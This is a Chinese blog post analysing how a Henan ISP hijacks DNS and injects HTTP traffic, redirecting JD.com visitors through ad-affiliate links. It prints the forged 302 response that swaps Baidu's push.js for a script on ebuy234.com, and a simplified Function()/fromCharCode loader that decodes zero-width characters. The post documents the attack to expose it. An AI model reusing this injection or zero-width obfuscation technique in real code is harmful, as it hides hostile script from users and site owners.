移动欺负百度，用 fromCharCode 和字符替换隐藏自己，防不胜防

河南铁通，目前已经合并入河南移动。

使用河南铁通的宽带，目前遇到两个问题：

1. DNS 劫持和污染
2. HTTP 攻击

使用铁通服务很久了，最开始没有这样的中间人攻击，现在都出现了。在网上搜索，和广东移动的攻击很类似，猜测是有组织的。

DNS 劫持主要是让特定域名（主要是不存在的）转向到一个铁通的广告页面。 DNS 污染主要通过对 53 端口的攻击。

HTTP 攻击的现象主要体现是访问京东时，大概有 30% 以上的概率跳到广告联盟相关链接，然后跳回首页。在访问某件具体商品时很烦，总是打不开商品，被跳回首页。

刚开始以为这个工具是针对京东，按照以前的经验，从页面源码入手，没发现什么特别的。然后抓包仔细研究。

发现目前 HTTP 攻击的流程大概是这样的：

1. 攻击者先找到一个具有普适性的链接，于是瞄准了百度。比如京东页面中包含一个百度相关 JS 代码会被动态插入，当协议不为 https 时，这段代码的值为 http://push.zhanzhang.baidu.com/push.js。
2. 进行劫持，将 http://push.zhanzhang.baidu.com/push.js 的返回信息修改为这样：

HTTP/1.1 302 Temporarily Moved
Location: http://0.ebuy234.com/41.s.1.jpg
Cache-Control: nocache
Pragma: no-cache
Expires: -1
Connection: close
Content-Type: text/html
Content-length: 0

1. ebuy234.com 这个域名很可能就是攻击者拥有的。41.s.1.jpg 这个文件名也是有意义的，41.s.1 就是在广告联盟中的账号。
2. 这是查看 http://0.ebuy234.com/41.s.1.jpg 这个请求的返回信息：

HTTP/1.1 200 OK
Server: marco/0.18
Date: Mon, 12 Sep 2016 09:14:14 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Source: U/200
X-Cache: MISS from mix-hz-fdi-171; HIT(R) from cmn-js-czx-132
Cache-Control: max-age=636911
ETag: W/"e90cbe32b9476b0b5141b1dfa1efe4e9"
Expires: Thu, 15 Sep 2016 22:41:39 GMT
Last-Modified: Thu, 25 Aug 2016 05:22:20 GMT
X-Request-Id: 807dd97c8bdb2fc7417702ae3d8ac9cb; d870a4b7c963d11713631a13c91513de
Age: 471141
X-Mirror-Request-Id: 156a2b2ac6c56484a81210e3894023a9
Via: T.101168.M.1, T.596.M.1, V.ctn-zj-hgh-092, S.mix-hz-fdi-170, V.mix-hz-fdi-171, T.165133.R.1, M.cmn-js-czx-132
Content-Length: 18169

Function('‌‍​‌‌‍'.replace(/..../g,function($){return String.fromCharCode(parseInt($.replace(/./g,function($){return {'​':'00','‌':'01','‍':'10','':'11'}[$]}),2))}))()

这就是关键了，字符替换。以上代码已经简化。

1. 然后再次载入一个功能类似的文件 http://v.usee123.com/41_s_1.json。
2. 最后就是跳转到广告联盟的链接了： p.egou.com